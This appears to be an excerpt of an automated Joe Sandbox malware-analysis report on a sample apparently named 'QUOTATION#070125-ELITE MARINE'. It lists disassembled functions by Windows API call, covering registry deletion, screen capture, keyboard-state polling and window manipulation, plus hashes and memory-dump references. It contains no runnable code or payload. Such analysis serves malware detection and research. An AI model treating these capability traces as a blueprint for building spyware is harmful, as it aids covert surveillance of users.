                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BB6F4
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006BB772
                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 006BB80A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BB87E
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BB89C
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 006BB8F2
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006BB904
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 006BB922
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 006BB983
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BB994
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 1742008743-4033151799
                                                                            • Opcode ID: 07eeb3cf140fdc489198eef361424661aeb14108006e682a6a2822065398cefe
                                                                            • Instruction ID: bd4b05e145e6b911c8220daf9ccb658f68da90c93f753e7a2184a6ce1cf8136b
                                                                            • Opcode Fuzzy Hash: 07eeb3cf140fdc489198eef361424661aeb14108006e682a6a2822065398cefe
                                                                            • Instruction Fuzzy Hash: 6EC17C74208201AFD714DF14C494FAABBE6BF85318F14945CF59A4B3A2CBB1ED86CB91
                                                                            Function 006B255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 006B25D8
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006B25E8
                                                                            • CreateCompatibleDC.GDI32(?), ref: 006B25F4
                                                                            • SelectObject.GDI32(00000000,?), ref: 006B2601
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 006B266D
                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006B26AC
                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006B26D0
                                                                            • SelectObject.GDI32(?,?), ref: 006B26D8
                                                                            • DeleteObject.GDI32(?), ref: 006B26E1
                                                                            • DeleteDC.GDI32(?), ref: 006B26E8
                                                                            • ReleaseDC.USER32(00000000,?), ref: 006B26F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: 9d77129e148ff300ea3215462693497aec741016bc731279af99fcde497b4ea0
                                                                            • Instruction ID: 3bef74a698c8b934827c38c3e738b321145c014a08d631a22de71ef5a084e45c
                                                                            • Opcode Fuzzy Hash: 9d77129e148ff300ea3215462693497aec741016bc731279af99fcde497b4ea0
                                                                            • Instruction Fuzzy Hash: 9161F2B5D00219EFCB14CFA8D884EAEBBF6FF48310F248529E959A7250E771A9418F54
                                                                            Function 006BC998 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            • Opcode ID: 2ccebcf75011a407e1950e5f62b0835b121fcd4b0bca6f2e45379d3fc8ada9e7
                                                                            • Instruction ID: d320f436f4bcb19a461b2d7dfc7f77ef98a0f4de0fa4d3a802efc3c3c4d9a729
                                                                            • Opcode Fuzzy Hash: 2ccebcf75011a407e1950e5f62b0835b121fcd4b0bca6f2e45379d3fc8ada9e7
                                                                            • Instruction Fuzzy Hash: 9871C3B261012A8BCB20DE6CC9515FE3793AB61774F250528FC56AB385EA31DFC583A4
                                                                            Function 006C8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006C8D5A
                                                                            • GetFocus.USER32 ref: 006C8D6A
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 006C8D75
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 006C8E1D
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006C8ECF
                                                                            • GetMenuItemCount.USER32(?), ref: 006C8EEC
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 006C8EFC
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006C8F2E
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006C8F70
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006C8FA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                            • String ID: 0
                                                                            • API String ID: 1026556194-4108050209
                                                                            • Opcode ID: 44ef57c650615016adc0d0fcdff9da8aa9f6947881d8f1fafce2d3117cd36ced
                                                                            • Instruction ID: 0e2e23f9f221e7bd6545e86f7ab571dc0f85b0591fdf4e7507d232d924a469e8
                                                                            • Opcode Fuzzy Hash: 44ef57c650615016adc0d0fcdff9da8aa9f6947881d8f1fafce2d3117cd36ced
                                                                            • Instruction Fuzzy Hash: 82817B71508301AFD720CF24D884EBB7BEAFB89364F140A5DF99997291DB74E901CBA1
                                                                            Function 0069BF30 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(00701990,000000FF,00000000,00000030), ref: 0069BFAC
                                                                            • SetMenuItemInfoW.USER32(00701990,00000004,00000000,00000030), ref: 0069BFE1
                                                                            • Sleep.KERNEL32(000001F4), ref: 0069BFF3
                                                                            • GetMenuItemCount.USER32(?), ref: 0069C039
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0069C056
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 0069C082
                                                                            • GetMenuItemID.USER32(?,?), ref: 0069C0C9
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0069C10F
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0069C124
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0069C145
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                            • String ID: 0
                                                                            • API String ID: 1460738036-4108050209
                                                                            • Opcode ID: 2053983cc93bee13112c17abc3808fe004508b2ecbd037df7f8b64d020873871
                                                                            • Instruction ID: 29c2db5dab24f6659a3a5f3bb39f5c45bd92d1cc38bc9a059b1d016ad592d346
                                                                            • Opcode Fuzzy Hash: 2053983cc93bee13112c17abc3808fe004508b2ecbd037df7f8b64d020873871
                                                                            • Instruction Fuzzy Hash: AC619DB090024AAFDF11CF64DD88EFEBBAEEB05364F404159E805A3692C735AD55CB64
                                                                            Function 006BCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006BCC64
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 006BCC8D
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006BCD48
                                                                              • Part of subcall function 006BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 006BCCAA
                                                                              • Part of subcall function 006BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 006BCCBD
                                                                              • Part of subcall function 006BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006BCCCF
                                                                              • Part of subcall function 006BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006BCD05
                                                                              • Part of subcall function 006BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006BCD28
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 006BCCF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2734957052-4033151799
                                                                            • Opcode ID: e7f686b2ae433e5214b602763dbe537274fc3fe9e2fa44120e989045d205a84d
                                                                            • Instruction ID: 4b388a936ceba7eb3b263a772b2fa982fc372ecefd191f5314bd4a56606f3db3
                                                                            • Opcode Fuzzy Hash: e7f686b2ae433e5214b602763dbe537274fc3fe9e2fa44120e989045d205a84d
                                                                            • Instruction Fuzzy Hash: 983160B5A01129BBD7208B55DC88EFFBB7EEF55764F000165E909E2240D7349B85DBA0
                                                                            Function 006500C6 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • InitializeConditionVariable, xrefs: 00650148
                                                                            • SleepConditionVariableCS, xrefs: 00650154
                                                                            • kernel32.dll, xrefs: 00650133
                                                                            • WakeAllConditionVariable, xrefs: 00650162
                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00650122
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule$CountCriticalInitializeSectionSpin
                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                            • API String ID: 798235881-1714406822
                                                                            • Opcode ID: 0e7b0244a16b7e9dd9766b00a79b715a562c87743f9e9d361a3ac0050c664a80
                                                                            • Instruction ID: c358c1890f99fcd585cee413e1f157d13d6217e3ef6434c5ea5d8292df7c9c2b
                                                                            • Opcode Fuzzy Hash: 0e7b0244a16b7e9dd9766b00a79b715a562c87743f9e9d361a3ac0050c664a80
                                                                            • Instruction Fuzzy Hash: 86210732640B01ABFB205BA4AC05F7A3797EF44B72F15012DFC05927D1DF68D8048A95
                                                                            Function 0069E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 0069E6B4
                                                                              • Part of subcall function 0064E551: timeGetTime.WINMM(?,?,0069E6D4), ref: 0064E555
                                                                            • Sleep.KERNEL32(0000000A), ref: 0069E6E1
                                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0069E705
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0069E727
                                                                            • SetActiveWindow.USER32 ref: 0069E746
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0069E754
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0069E773
                                                                            • Sleep.KERNEL32(000000FA), ref: 0069E77E
                                                                            • IsWindow.USER32 ref: 0069E78A
                                                                            • EndDialog.USER32(00000000), ref: 0069E79B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: af5f9a35b5afe6d170c24811374750dfa94cd0262dea5b6af6090b2a055829ea
                                                                            • Instruction ID: adfa3b79f24ca1eccdef53eab38d51df6f1b192709e10a63cee7b0fba03b4979
                                                                            • Opcode Fuzzy Hash: af5f9a35b5afe6d170c24811374750dfa94cd0262dea5b6af6090b2a055829ea
                                                                            • Instruction Fuzzy Hash: DF218E71200204EFEF00AF61EC8DE353B6FF754768B145524F50981AA2DF67AC41DB29
                                                                            Function 0069E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0069EA5D
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0069EA73
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069EA84
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0069EA96
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0069EAA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: SendString
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 890592661-1007645807
                                                                            • Opcode ID: bc4a6d51e1c7d10e98a9680bdb712a84697087f34de09b1c26c4a047d27ac5fc
                                                                            • Instruction ID: a2f7e871ea1e14d5bf0f3474a957c3ea725dfdb601e7ad33feb52501287bd36d
                                                                            • Opcode Fuzzy Hash: bc4a6d51e1c7d10e98a9680bdb712a84697087f34de09b1c26c4a047d27ac5fc
                                                                            • Instruction Fuzzy Hash: DA117331A9026E79DB20E7A1DC4AEFF6B7EEBD1B10F410429B511A20E1EEF15D05C6B0
                                                                            Function 00699F91 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 0069A012
                                                                            • SetKeyboardState.USER32(?), ref: 0069A07D
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0069A09D
                                                                            • GetKeyState.USER32(000000A0), ref: 0069A0B4
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0069A0E3
                                                                            • GetKeyState.USER32(000000A1), ref: 0069A0F4
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0069A120
                                                                            • GetKeyState.USER32(00000011), ref: 0069A12E
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0069A157
                                                                            • GetKeyState.USER32(00000012), ref: 0069A165
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0069A18E
                                                                            • GetKeyState.USER32(0000005B), ref: 0069A19C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: d265546bfa75053c4b9685637a46367abf20786a819492c10fe2d400bcade620
                                                                            • Instruction ID: 0678f1d86ea807580250b5ffff750730c6f4a71e375ead6bf0a240ba4cebfdb6
                                                                            • Opcode Fuzzy Hash: d265546bfa75053c4b9685637a46367abf20786a819492c10fe2d400bcade620
                                                                            • Instruction Fuzzy Hash: 8551E83090478429FF35DBA489107EAAFFA9F11384F08459ED5C257AC2DA549A4CC7A6
                                                                            Function 00695CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00695CE2
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00695CFB
                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00695D59
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00695D69
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00695D7B
                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00695DCF
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00695DDD
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00695DEF
                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00695E31
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00695E44
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00695E5A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00695E67
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 7796c33b552fb1a1c4bd9ceb666f9402ecec45ea1dd9e8ecb46d1c0c8bafe65d
                                                                            • Instruction ID: 4ab73c0ddec4e26f8a0553c44d7e7108a30ef8f8661681c43039af0f484ed00e
                                                                            • Opcode Fuzzy Hash: 7796c33b552fb1a1c4bd9ceb666f9402ecec45ea1dd9e8ecb46d1c0c8bafe65d
                                                                            • Instruction Fuzzy Hash: 94512FB0A00615AFDF18CF69CD99EAE7BBAFF48310F108129F51AE6690D7709E04CB50
                                                                            Function 00648BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00648F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00648BE8,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 00648FC5
                                                                            • DestroyWindow.USER32(?), ref: 00648C81
                                                                            • KillTimer.USER32(00000000,?,?,?,?,00648BBA,00000000,?), ref: 00648D1B
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00686973
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 006869A1
                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 006869B8
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00648BBA,00000000), ref: 006869D4
                                                                            • DeleteObject.GDI32(00000000), ref: 006869E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 641708696-0
                                                                            • Opcode ID: febb8e471fa64a7a500ce6a192bdee414f0c2a77bfb76c9d3dc49e511b5f573e
                                                                            • Instruction ID: 2d9ca3f9397ac602b24d70d6da2628da8a74149e8f59a89a50c1916563dfe293
                                                                            • Opcode Fuzzy Hash: febb8e471fa64a7a500ce6a192bdee414f0c2a77bfb76c9d3dc49e511b5f573e
                                                                            • Instruction Fuzzy Hash: 1461AC30502711DFCB25AF14DA88BA977F3FB40326F54961CE0469B6A0CB75AD81CFA8
                                                                            Function 00649838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649944: GetWindowLongW.USER32(?,000000EB), ref: 00649952
                                                                            • GetSysColor.USER32(0000000F), ref: 00649862
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
